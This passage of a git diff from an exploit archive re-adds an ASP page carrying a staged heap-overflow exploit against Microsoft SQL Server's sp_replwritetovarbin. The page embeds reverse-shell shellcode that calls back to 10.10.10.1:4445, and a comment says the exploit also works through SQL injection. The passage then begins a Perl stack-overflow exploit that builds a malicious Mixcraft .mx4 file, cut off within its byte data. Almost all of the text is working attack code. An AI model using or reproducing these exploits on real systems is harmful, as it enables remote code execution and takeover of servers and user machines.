master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ -"SET @val = CHAR(0x41) "&_ -"SET @counter = 0 "&_ -"WHILE @counter < 3021 "&_ -"BEGIN "&_ -" SET @counter = @counter + 1 "&_ -" IF @counter = 2900 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x43) "&_ -" END "&_ -" ELSE IF @counter = 299 "&_ -" BEGIN "&_ -" SET @val = 
CHAR(0x42) "&_ -" END "&_ -" ELSE IF @counter = 300 "&_ -" BEGIN "&_ - - -" /* Third byte overwritten here */ "&_ -" SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ -" CONTINUE "&_ -" END "&_ -" SET @buf = @buf + @val "&_ -"END "&_ -"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ -"EXEC master..sp_executesql @buf" - - - - - -// ########################################### FOURTH QUERY -SQL4 = "DECLARE @buf NVARCHAR(4000), "&_ -"@val NVARCHAR(4), "&_ -"@counter INT "&_ -"SET @buf = ' "&_ -"declare @retcode int, "&_ -"@end_offset int, "&_ -"@vb_buffer varbinary, "&_ -"@vb_bufferlen int "&_ -"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ -"SET @val = CHAR(0x41) "&_ -"SET @counter = 0 "&_ -"WHILE @counter < 2708 "&_ -"BEGIN "&_ -" SET @counter = @counter + 1 "&_ -" IF @counter = 2900 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x43) "&_ -" END "&_ -" IF @counter = 108 "&_ -" BEGIN "&_ - - -" /* this is the pointer we wrote - 0x38. 
It points to a CALL ECX */ "&_ -" SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_ - - -" /* realign code */ "&_ -" SET @buf = @buf + CHAR(0xe1) "&_ - - -" /* realign the stack */ "&_ -" SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_ - - -" /* jump ahead */ "&_ -" SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_ -" SET @counter = @counter + 12 "&_ -" CONTINUE "&_ -" END "&_ -" ELSE IF @counter = 299 "&_ -" BEGIN "&_ -" SET @val = CHAR(0x42) "&_ -" END "&_ -" ELSE IF @counter = 300 "&_ -" BEGIN "&_ - - -" /* Fourth byte overwritten here */ "&_ -" SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ - - -" /* reverse shell on 10.10.10.1:4445 */ "&_ -" SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0
x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6) "&_ -" CONTINUE "&_ -" END "&_ -" SET @buf = @buf + @val "&_ -"END "&_ -"SET @buf = @buf + 
''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ -"EXEC master..sp_executesql @buf" - - -Set oConnection = Server.CreateObject("ADODB.Connection") -oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password -Set rs = Server.CreateObject("ADODB.Recordset") - -phase = Request.Querystring("p") - -if phase then - if phase = 1 then - rs.open SQL3, oConnection - rs.close - oConnection.Close - Set oConnection = Nothing - Response.Redirect("sql-exploit.asp?p=2") - elseif phase = 2 then - rs.open SQL4, oConnection - rs.close - oConnection.Close - Set oConnection = Nothing - Response.Redirect("sql-exploit.asp?p=3") - end if -Else - rs.open SQL, oConnection - rs.close - oConnection.Close - Set oConnection = Nothing - - Set oConnection = Server.CreateObject("ADODB.Connection") - oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password - Set rs = Server.CreateObject("ADODB.Recordset") - rs.open SQL2, oConnection - rs.close - oConnection.Close - Set oConnection = Nothing - - Response.Redirect("sql-exploit.asp?p=1") -end if - - -%> - - -</html> - -# milw0rm.com [2008-12-17] +<html> +<% +// k`sOSe 12/17/2008 +// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow +// Tested on Win2k SP4 with MSSQL 2000(on one box only!). +// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445), +// the change allows multiple shots :) +// +// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff. 
+ +// Take a look at the comments in T-SQL + + + +On Error Resume Next + +// change this +UserName = "r00t" +Password = "t00r" + +// ########################################### FIRST QUERY +SQL = "DECLARE @buf NVARCHAR(4000), "&_ +"@val NVARCHAR(4), "&_ +"@counter INT "&_ +"SET @buf = ' "&_ +"declare @retcode int, "&_ +"@end_offset int, "&_ +"@vb_buffer varbinary, "&_ +"@vb_bufferlen int "&_ +"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ +"SET @val = CHAR(0x41) "&_ +"SET @counter = 0 "&_ +"WHILE @counter < 3020 "&_ +"BEGIN "&_ +" SET @counter = @counter + 1 "&_ +" IF @counter = 2900 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x43) "&_ +" END "&_ +" ELSE IF @counter = 299 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x42) "&_ +" END "&_ +" ELSE IF @counter = 300 "&_ +" BEGIN "&_ + + +" /* First byte overwritten here. This is a random writable address */ "&_ +" SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ +" CONTINUE "&_ +" END "&_ +" SET @buf = @buf + @val "&_ +"END "&_ +"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ +"EXEC master..sp_executesql @buf" + + + + + +// ########################################### SECOND QUERY +SQL2 = "DECLARE @buf NVARCHAR(4000), "&_ +"@val NVARCHAR(4), "&_ +"@counter INT "&_ +"SET @buf = ' "&_ +"declare @retcode int, "&_ +"@end_offset int, "&_ +"@vb_buffer varbinary, "&_ +"@vb_bufferlen int "&_ +"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ +"SET @val = CHAR(0x41) "&_ +"SET @counter = 0 "&_ +"WHILE @counter < 3097 "&_ +"BEGIN "&_ +" SET @counter = @counter + 1 "&_ +" IF @counter = 2900 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x43) "&_ +" END "&_ +" ELSE IF @counter = 299 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x42) "&_ +" END "&_ +" ELSE IF @counter = 300 "&_ +" BEGIN "&_ + + +" /* Second byte overwritten here */ "&_ +" SET @buf = @buf + CHAR(0x45) + char(0xc0) 
+ char(0x4c) + CHAR(0x19) "&_ +" CONTINUE "&_ +" END "&_ +" SET @buf = @buf + @val "&_ +"END "&_ +"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ +"EXEC master..sp_executesql @buf" + + + + + +// ########################################### THIRD QUERY +SQL3 = "DECLARE @buf NVARCHAR(4000), "&_ +"@val NVARCHAR(4), "&_ +"@counter INT "&_ +"SET @buf = ' "&_ +"declare @retcode int, "&_ +"@end_offset int, "&_ +"@vb_buffer varbinary, "&_ +"@vb_bufferlen int "&_ +"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ +"SET @val = CHAR(0x41) "&_ +"SET @counter = 0 "&_ +"WHILE @counter < 3021 "&_ +"BEGIN "&_ +" SET @counter = @counter + 1 "&_ +" IF @counter = 2900 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x43) "&_ +" END "&_ +" ELSE IF @counter = 299 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x42) "&_ +" END "&_ +" ELSE IF @counter = 300 "&_ +" BEGIN "&_ + + +" /* Third byte overwritten here */ "&_ +" SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ +" CONTINUE "&_ +" END "&_ +" SET @buf = @buf + @val "&_ +"END "&_ +"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_ +"EXEC master..sp_executesql @buf" + + + + + +// ########################################### FOURTH QUERY +SQL4 = "DECLARE @buf NVARCHAR(4000), "&_ +"@val NVARCHAR(4), "&_ +"@counter INT "&_ +"SET @buf = ' "&_ +"declare @retcode int, "&_ +"@end_offset int, "&_ +"@vb_buffer varbinary, "&_ +"@vb_bufferlen int "&_ +"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ +"SET @val = CHAR(0x41) "&_ +"SET @counter = 0 "&_ +"WHILE @counter < 2708 "&_ +"BEGIN "&_ +" SET @counter = @counter + 1 "&_ +" IF @counter = 2900 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x43) "&_ +" END "&_ +" IF @counter = 108 "&_ +" BEGIN "&_ + + +" /* this is the pointer we wrote - 0x38. 
It points to a CALL ECX */ "&_ +" SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_ + + +" /* realign code */ "&_ +" SET @buf = @buf + CHAR(0xe1) "&_ + + +" /* realign the stack */ "&_ +" SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_ + + +" /* jump ahead */ "&_ +" SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_ +" SET @counter = @counter + 12 "&_ +" CONTINUE "&_ +" END "&_ +" ELSE IF @counter = 299 "&_ +" BEGIN "&_ +" SET @val = CHAR(0x42) "&_ +" END "&_ +" ELSE IF @counter = 300 "&_ +" BEGIN "&_ + + +" /* Fourth byte overwritten here */ "&_ +" SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ + + +" /* reverse shell on 10.10.10.1:4445 */ "&_ +" SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0
x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6) "&_ +" CONTINUE "&_ +" END "&_ +" SET @buf = @buf + @val "&_ +"END "&_ +"SET @buf = @buf + 
''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
+"EXEC master..sp_executesql @buf"
+
+
+Set oConnection = Server.CreateObject("ADODB.Connection")
+oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
+Set rs = Server.CreateObject("ADODB.Recordset")
+
+phase = Request.Querystring("p")
+
+if phase then
+ if phase = 1 then
+ rs.open SQL3, oConnection
+ rs.close
+ oConnection.Close
+ Set oConnection = Nothing
+ Response.Redirect("sql-exploit.asp?p=2")
+ elseif phase = 2 then
+ rs.open SQL4, oConnection
+ rs.close
+ oConnection.Close
+ Set oConnection = Nothing
+ Response.Redirect("sql-exploit.asp?p=3")
+ end if
+Else
+ rs.open SQL, oConnection
+ rs.close
+ oConnection.Close
+ Set oConnection = Nothing
+
+ Set oConnection = Server.CreateObject("ADODB.Connection")
+ oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
+ Set rs = Server.CreateObject("ADODB.Recordset")
+ rs.open SQL2, oConnection
+ rs.close
+ oConnection.Close
+ Set oConnection = Nothing
+
+ Response.Redirect("sql-exploit.asp?p=1")
+end if
+
+
+%>
+
+
+</html>
+
+# milw0rm.com [2008-12-17]
diff --git a/platforms/windows/local/7577.pl b/platforms/windows/local/7577.pl
index 63014c443..b261b9b39 100755
--- a/platforms/windows/local/7577.pl
+++ b/platforms/windows/local/7577.pl
@@ -1,145 +1,145 @@ -#!/usr/bin/perl -# -# Acoustica Mixcraft <= 4.2 Universal Stack Overflow Exploit (SEH) -# ------------------------------------------------------ -# Found/Exploit by SkD (skdrat@hotmail.com) -# -# MixCraft Download = http://www.acoustica.com/mixcraft/download.htm -# -# A local exploit for the .mx4 project file affecting MixCraft 4.2 (other versions -# may also work). I knew of this vulnerability since MixCraft 3, so -# it's time to release a fresh exploit to the public for the latest ver of this -# software. -# This exploit also implements the SEH technique to exploit the issue and it -# works on all Windows versions. -# -# Enjoy. -# -# Note: Author has no resposibility over the damage you do with this! - -use strict; -use warnings; -my $mx4_data1 = "\x52\x49\x46\x46\xBC\x14\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x01".("\x00" x 2320). - "\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x01\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00". - "\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x54\x72\x6B\x4D\xA0\x07\x00\x00\x9A\x99\x99\x99\x99\x99\xF1\x3F\x00\x00". - "\x00\x00\x49\x6E\x73\x74\x72\x75\x6D\x65\x6E\x74\x20\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - 